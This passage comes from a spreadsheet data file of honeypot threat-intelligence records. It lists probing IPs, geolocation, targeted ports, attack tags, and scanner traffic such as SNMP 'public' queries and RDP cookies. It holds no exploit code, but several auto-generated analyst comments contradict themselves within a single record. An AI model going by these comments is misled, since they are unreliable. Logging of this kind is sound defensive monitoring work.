    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NW"/>
    <s v="North Rhine-Westphalia"/>
    <s v="Düsseldorf District"/>
    <s v="Düsseldorf"/>
    <s v="2934246"/>
    <s v="40213"/>
    <s v="51.2277"/>
    <s v="6.77346"/>
    <s v="43357"/>
    <s v="OWL"/>
    <s v="Mullvad"/>
    <s v="hosting"/>
    <s v="Mullvad VPN AB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9fe:4b24"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No VNC connection attempt detected, implying normal service usage or lack of probing attempts. &amp;&amp; The data indicates an attempt to establish a VNC connection, which is often used for unauthorized remote access or control of systems._x000a_This could be a sign of malicious activity such as reconnaissance or lateral movement by an attacker._x000a_Further investigation would be needed to determine the full scope and intention behind this attempt."/>
    <s v="VNC Attack &amp;&amp; VNC Bruteforce"/>
  </r>
  <r>
    <x v="711"/>
    <x v="711"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-27T00:03:58"/>
    <d v="2025-04-26T23:44:08"/>
    <d v="2025-04-27T00:03:58"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="FL"/>
    <s v="Florida"/>
    <s v="Miami-Dade County"/>
    <s v="Miami"/>
    <s v="4164138"/>
    <s v="33102"/>
    <s v="25.7617"/>
    <s v="-80.1918"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext MIA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d86:8ed2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown activity detected, possibly an attempted MySQL connection or database scan. The data indicates no login credentials were provided, suggesting a probing or reconnaissance attempt. This could be a precursor to a more malicious action such as unauthorized access or data theft. &amp;&amp; No data was sent or received for MySQL service, indicating potential probing or scanning activity. _x000a_This could be an attempt to identify vulnerabilities in the system. _x000a_It may also indicate a scanner looking for open ports or services."/>
    <m/>
  </r>
  <r>
    <x v="712"/>
    <x v="712"/>
    <s v="i60-43-35-52.s30.a048.ap.plala.or.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-26T23:54:34"/>
    <d v="2025-02-18T14:20:56"/>
    <d v="2025-04-26T23:54:34"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="27"/>
    <s v="Osaka"/>
    <s v="Osaka-shi"/>
    <s v="Osaka"/>
    <s v="1853909"/>
    <s v="540-0002"/>
    <s v="34.6937"/>
    <s v="135.502"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="NTT Communications Corporation"/>
    <s v="2004-04-02"/>
    <s v="OCN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['dns-sa1.plala.or.jp', 'dns-sd1.plala.or.jp', 'ns2.sphere.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/07/31)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c2b:2334"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="713"/>
    <x v="713"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T23:51:46"/>
    <d v="2025-04-26T23:51:46"/>
    <d v="2025-04-26T23:51:46"/>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d:9503"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="714"/>
    <x v="714"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T23:50:09"/>
    <d v="2025-04-26T22:38:16"/>
    <d v="2025-04-26T23:50:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:21c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="715"/>
    <x v="715"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T23:27:09"/>
    <d v="2024-04-17T20:42:54"/>
    <d v="2025-04-26T23:27:09"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="2477&amp;&amp;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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:56a5"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log suggests that there was an attempted connection to the TELNET service, but no data was received from this connection attempt, possibly indicating a reconnaissance probe. The lack of data transmitted might indicate that the attacker is trying to detect if the service is active or not. This could be a precursor to further malicious activity. &amp;&amp; No TELNET activity was detected, which suggests an attempt to bypass or evade TELNET-based monitoring or detection systems may have been attempted. This could be a sign of a malicious actor trying to remain undetected. The lack of TELNET activity in itself is not necessarily suspicious but may indicate attempts to obscure true intentions."/>
    <m/>
  </r>
  <r>
    <x v="716"/>
    <x v="716"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T23:01:45"/>
    <d v="2025-04-26T23:01:45"/>
    <d v="2025-04-26T23:01:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="IB"/>
    <s v="Balearic Islands"/>
    <s v="Balearic Islands"/>
    <s v="Capdepera"/>
    <s v="2520200"/>
    <s v="07580"/>
    <s v="39.7024"/>
    <s v="3.43532"/>
    <s v="3352"/>
    <s v="Telefonica_de_Espana"/>
    <s v="RIMA (Red IP Multi Acceso)"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5cd:8a36"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, indicating a lack of attempted login attempts via this service._x000a_TELNET is typically used for remote access to systems, so its absence may indicate secure configuration or minimal exposure to the internet._x000a_However, this alone does not necessarily suggest malicious activity. &amp;&amp; This log indicates that the service is unavailable for TELNET connections, suggesting potential scanning or probing activity by an attacker to identify available services. The absence of a response from the service could be due to a denial-of-service attack or a deliberate attempt to exploit vulnerabilities. This may be indicative of reconnaissance efforts by malicious actors."/>
    <s v="Port Scan &amp;&amp; Port scan"/>
  </r>
  <r>
    <x v="717"/>
    <x v="717"/>
    <s v="27-96-225-238.veetime.com"/>
    <x v="0"/>
    <d v="2025-04-26T22:42:32"/>
    <d v="2025-04-26T22:42:32"/>
    <d v="2025-04-26T22:42:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="17809"/>
    <s v="VEETIME-TW-AP"/>
    <s v="Emax"/>
    <s v="corporate"/>
    <s v="VMAX Telecom Co., Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2009-11-27 10:29:39"/>
    <s v="2027-11-27 10:29:39"/>
    <s v="2024-09-30 09:33:59"/>
    <s v="['NS1.EMAX.NET.TW', 'NS2.EMAX.NET.TW']"/>
    <s v="Net-Chinese Co., Ltd."/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="14"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:1b60:e1ee"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="718"/>
    <x v="718"/>
    <s v="139-162-187-200.ip.linodeusercontent.com"/>
    <x v="0"/>
    <d v="2025-04-26T22:27:35"/>
    <d v="2025-04-26T22:26:04"/>
    <d v="2025-04-26T22:27:35"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode, LLC"/>
    <s v="1990-03-24"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2019-12-18 18:38:04"/>
    <s v="2026-12-18 18:38:04"/>
    <s v="2023-03-15 12:08:41"/>
    <s v="['A1-249.AKAM.NET', 'A12-65.AKAM.NET', 'A16-64.AKAM.NET', 'A3-67.AKAM.NET', 'A4-64.AKAM.NET', 'A7-65.AKAM.NET']"/>
    <s v="MarkMonitor, Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)', 'clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)', 'clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)', 'serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)', 'serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)', 'serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)']"/>
    <s v="None"/>
    <x v="15"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:8ba2:bbc8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="A user with a Windows system is attempting to log in using an outdated version of Google Chrome from within the browser itself. This may be a brute force attack or unauthorized access attempt. User's IP address and location are likely being masked. &amp;&amp; Possible malicious activity: An attempt to login with a fake user agent string from an IP address suggesting a Windows 10 system attempting to impersonate legitimate web browser behavior. The fake user agent may be used to evade detection or bypass security measures."/>
    <m/>
  </r>
  <r>
    <x v="719"/>
    <x v="719"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T22:22:03"/>
    <d v="2023-12-13T10:10:28"/>
    <d v="2025-04-26T22:22:03"/>
    <n v="543"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_NTP_H8&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_NTP_H40&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_SOCKS5_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;3389&amp;&amp;3306&amp;&amp;1080&amp;&amp;22&amp;&amp;45404&amp;&amp;9100&amp;&amp;5900&amp;&amp;23&amp;&amp;NA&amp;&amp;1433&amp;&amp;1521&amp;&amp;5432&amp;&amp;161&amp;&amp;6379&amp;&amp;445&amp;&amp;110&amp;&amp;443&amp;&amp;80&amp;&amp;63566&amp;&amp;389&amp;&amp;63590&amp;&amp;6667&amp;&amp;54527"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZNaGeNbQu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lVQRhQGFd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KDerkb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kkFWmL'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTPS:{'Host': '194-146-12-172.plesk.page', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1883"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The system is unable to collect SNMP logs, potentially indicating a security issue with monitoring capabilities or access restrictions. This could be due to misconfigured settings or deliberate attempts to evade detection. Monitoring data loss may indicate malicious activity attempting to remain undetected. &amp;&amp; Unauthorized access to the network is detected, likely a reconnaissance attempt, with an attacker attempting to retrieve system information using default credentials. The attacker has attempted to use publicly available SNMP community string 'public'. This suggests a potential vulnerability in network security configuration."/>
    <s v="Network Scan"/>
  </r>
  <r>
    <x v="720"/>
    <x v="720"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T22:13:53"/>
    <d v="2025-04-26T22:13:53"/>
    <d v="2025-04-26T22:13:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Medchal Malkajgiri"/>
    <s v="Secunderabad"/>
    <s v="1256922"/>
    <s v="500003"/>
    <s v="17.4399"/>
    <s v="78.4983"/>
    <s v="18209"/>
    <s v="CABLELITE-AS-AP"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="consumer"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b752:7a68"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No VNC login attempt was made, but the service remains active. This could indicate idle scanning or reconnaissance by an attacker checking for vulnerable services. The lack of a login attempt suggests the attacker may have been probing rather than actively trying to exploit the service. &amp;&amp; No VNC (Virtual Network Computing) activity detected, which could indicate that the system is being tested for vulnerabilities or waiting for user interaction to exploit it further. _x000a_A potential attack vector is being kept open and unused for now._x000a_This inactivity might be a tactic to remain stealthy while keeping options open for future exploitation."/>
    <m/>
  </r>
  <r>
    <x v="721"/>
    <x v="721"/>
    <s v="114-33-113-102.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-26T22:10:30"/>
    <d v="2023-07-25T09:19:39"/>
    <d v="2025-04-26T22:10:30"/>
    <n v="3809"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_LDAP_H38&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;22&amp;&amp;631&amp;&amp;1080&amp;&amp;51738&amp;&amp;23&amp;&amp;41094&amp;&amp;NA&amp;&amp;9100"/>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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:7166"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="722"/>
    <x v="722"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-26T21:11:32"/>
    <d v="2025-04-16T22:39:55"/>
    <d v="2025-04-26T21:11:32"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H4"/>
    <s v="25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
